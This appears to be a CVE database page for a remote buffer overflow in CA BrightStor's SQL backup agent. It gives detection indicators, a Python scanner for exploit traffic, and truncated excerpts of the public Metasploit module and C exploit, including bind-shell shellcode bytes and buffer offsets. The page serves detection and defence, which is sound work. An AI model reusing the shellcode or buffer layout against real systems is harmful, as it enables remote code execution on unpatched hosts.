CVE-2005-1272
Published: 2005-08-05
Priority: P2 · 62 · CVSS 2.0 base score 7.5 (high), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit code available (Exploit-DB and Metasploit entries below)
EPSS: 66.12% (99.2th percentile)
Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050.
Affected
12 CPE ranges are listed; none records version bounds or a fixed version, so the table is collapsed to the distinct vendor/product pairs with the number of ranges each covers. The advisory text itself names BrightStor ARCserve Backup Agent for SQL Server 11.0.

| Vendor | Product | Version range | Fixed in | CPE ranges |
|---|---|---|---|---|
| broadcom | brightstor_enterprise_backup | — | — | 2 |
| ca | brightstor_arcserve_backup | — | — | 4 |
| ca | brightstor_arcserve_backup_agent | — | — | 4 |
| ca | brightstor_enterprise_backup_agent | — | — | 2 |
Detection & IOCs (extracted from sources)
Bytes: \xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff
These are the first 32 bytes of the bind-shell payload in the original exploit (the same bytes open the bindshell[] array in the C source below). They decode to a jmp/call/pop XOR decoder loop: pop esi; xor ecx,ecx; sub ecx,-119; then xor dword [esi],0x9432bf80 / add 4 to esi / loop, so the loop walks 119 dwords (476 bytes) of encoded payload. The decoder skeleton (\xeb\x19\x5e\x31\xc9\x81\xe9 ... \xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff) is shared by every payload built with that encoder, so a signature on it matches more than this CVE; the key bytes \x80\xbf\x32\x94 and the length byte \x89 are specific to this one sample and will not match a re-encoded payload.
- Monitor TCP connections to ports 6070 and 6050 on hosts running the BrightStor ARCserve Backup Agent for SQL Server (dbasqlr.exe); requests larger than about 3000 bytes to these ports are indicative of exploitation attempts.
- The public exploit sends a memory-flush sequence of 0x12000 bytes of 0xFF before the overflow buffer; a long run of 0xFF bytes on port 6070 is a pre-exploitation indicator.
- The exploit buffer is 3288 bytes, with the return-address overwrite at offset 3168 and a backward JMP stub at offset 3172. An exact-length match on 3288 bytes catches only this one build (the Metasploit variant uses a different jump displacement, which implies a different layout), so treat the length as a weak signal alongside the structural indicators below.
- A stack-adjustment gadget sits at offset 1337 in the buffer: look for the byte sequence \x81\xc4\x54\xf2\xff\xff (ADD ESP, -3500) inside oversized requests to port 6070.
- The backward JMP stub is \xe9\xd0\xf8\xff\xff at offset 3172 (\xe9\x4f\xf6\xff\xff in the Metasploit variant); detect these near-end-of-buffer JMP sequences in oversized TCP payloads on port 6070.
- The only bad character is \x00, so shellcode signatures must allow the full byte range except null bytes; do not rely on the absence of high bytes or on printable-only heuristics.
- The Metasploit module notes that "The one line request does not work against Windows 2003" and falls back to multiple connections with memory-flush pre-requests; detection logic should correlate connections per source rather than judging each request in isolation.
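The indicators above translate directly into a small scanner. The block below is an added example, not code from the CVE page, from cybertronic's exploit or from the Metasploit module: it takes the ports, offsets and byte sequences from the IOC list, checks each payload against them, and then correlates per source address so that the multi-connection flush-then-overflow pattern is caught as one attempt. The thresholds (0x1000 bytes of 0xFF for a flush run, 3000 bytes for "oversized"), the verdict rules, and the sample traffic are assumptions made for the example; the 3288-byte sample buffer is filled with 'A' and a placeholder return address and is scanner test input, not a working exploit.

```python
"""Offline scanner for the CVE-2005-1272 indicators listed above.

Added example; not code from the CVE page, from cybertronic's exploit or from
the Metasploit module.  Offsets, ports and byte sequences are taken from the
IOC list; thresholds, sample traffic and verdict rules are assumptions.
"""

AGENT_PORTS = {6070, 6050}                         # dbasqlr.exe listeners named in the advisory
STACK_ADJUST_GADGET = b"\x81\xc4\x54\xf2\xff\xff"  # ADD ESP, -3500, at offset 1337 in the exploit buffer
JMP_BACK_STUBS = (
    b"\xe9\xd0\xf8\xff\xff",   # backward JMP at offset 3172 in the C exploit
    b"\xe9\x4f\xf6\xff\xff",   # the Metasploit variant's backward JMP
)
# First 32 bytes of the published bind-shell payload: the XOR decoder loop.
DECODER_STUB = bytes.fromhex(
    "eb195e31c981e989ffffff813680bf329481eefcffffffe2f2eb05e8e2ffffff"
)
EXPLOIT_BUFFER_LEN = 3288       # exact length of the C exploit's overflow buffer
OVERSIZE_THRESHOLD = 3000       # "large payload" cut-off from the IOC list
FLUSH_RUN = b"\xff" * 0x1000    # assumed threshold; the real pre-request is 0x12000 bytes of 0xFF
STRUCTURAL = {"stack_adjust_gadget", "jmp_back_stub", "decoder_stub"}


def scan_payload(dst_port, data):
    """Return the indicator names that match one TCP payload sent to one port."""
    hits = []
    if dst_port not in AGENT_PORTS:
        return hits                      # only the SQL agent ports are in scope
    if len(data) > OVERSIZE_THRESHOLD:
        hits.append("oversized_request")
    if FLUSH_RUN in data:
        hits.append("ff_flush_run")
    if len(data) == EXPLOIT_BUFFER_LEN:
        hits.append("exact_3288")        # weak: only the C exploit's build has this length
    if STACK_ADJUST_GADGET in data:
        hits.append("stack_adjust_gadget")
    if any(stub in data for stub in JMP_BACK_STUBS):
        hits.append("jmp_back_stub")
    if DECODER_STUB in data:
        hits.append("decoder_stub")
    return hits


def score_sessions(connections):
    """Correlate hits per source address.

    connections: iterable of (src_ip, dst_port, payload_bytes).
    A source is an exploit attempt if any payload carries a structural indicator
    (gadget, JMP stub or decoder), or if it sent a flush run in one connection and
    a separate oversized request in another (the multi-connection pattern the
    Metasploit module uses against Windows 2003).  Any other hit is "suspicious".
    """
    per_src = {}
    for src, port, data in connections:
        per_src.setdefault(src, []).append(set(scan_payload(port, data)))
    verdicts = {}
    for src, conns in per_src.items():
        all_hits = set().union(*conns)
        flushed = any("ff_flush_run" in h for h in conns)
        oversized_elsewhere = any(
            "oversized_request" in h and "ff_flush_run" not in h for h in conns
        )
        if all_hits & STRUCTURAL or (flushed and oversized_elsewhere):
            verdict = "exploit_attempt"
        elif all_hits:
            verdict = "suspicious"
        else:
            verdict = "clean"
        verdicts[src] = (verdict, sorted(all_hits))
    return verdicts


def build_sample_buffer():
    """Constructed 3288-byte buffer laid out per the IOC offsets.

    Filler is 'A', the decoder stub is dropped at offset 100 and the return
    address at 3168 is a placeholder: scanner test input, not a working exploit.
    """
    buf = bytearray(b"A" * EXPLOIT_BUFFER_LEN)
    buf[100:100 + len(DECODER_STUB)] = DECODER_STUB
    buf[1337:1337 + len(STACK_ADJUST_GADGET)] = STACK_ADJUST_GADGET
    buf[3168:3172] = b"\x42\x42\x42\x42"          # placeholder return address
    buf[3172:3172 + 5] = JMP_BACK_STUBS[0]
    return bytes(buf)


# Constructed sample traffic: one source doing flush + overflow across two
# connections, one sending only the flush, one that is benign.
SAMPLE_CONNECTIONS = [
    ("10.0.0.5", 6070, b"\xff" * 0x12000),
    ("10.0.0.5", 6070, build_sample_buffer()),
    ("10.0.0.7", 6070, b"\xff" * 0x12000),
    ("10.0.0.9", 6070, b"\x00" * 64 + b"AGENT STATUS"),
    ("10.0.0.9", 1433, build_sample_buffer()),     # wrong port: out of scope
]

if __name__ == "__main__":
    for src, (verdict, hits) in score_sessions(SAMPLE_CONNECTIONS).items():
        print(f"{src}: {verdict} {hits}")
```

Running it reports 10.0.0.5 as an exploit attempt, 10.0.0.7 (flush only) as suspicious and 10.0.0.9 as clean. A real sensor would feed reassembled TCP streams rather than single segments, since the flush and the overflow buffer can span several segments, and the exact-length check should stay advisory for the reason given in the list above.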
No detection rules found.
Exploit-DB: CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit), published 2010-04-30
---
##
# $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Agent for Microsoft SQL Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Agent for Microsoft SQL Server. This vulnerability was
				discovered by cybertronic[at]gmx.net.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-1272'],
					[ 'OSVDB', '18501' ]
Exploit-DB: CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow, published 2005-08-03
---
/*
* CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
*
* cybertronic[at]gmx[dot]net
*
*/
#include
#include
#include
#include
#define PORT 6070
unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\
Metasploit: CA BrightStor Agent for Microsoft SQL Overflow
This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net.
No writeups or analysis indexed.
References
- http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities&flashstatus=true
- http://www.kb.cert.org/vuls/id/279774
- http://www.securityfocus.com/bid/14453
- http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
- https://exchange.xforce.ibmcloud.com/vulnerabilities/21656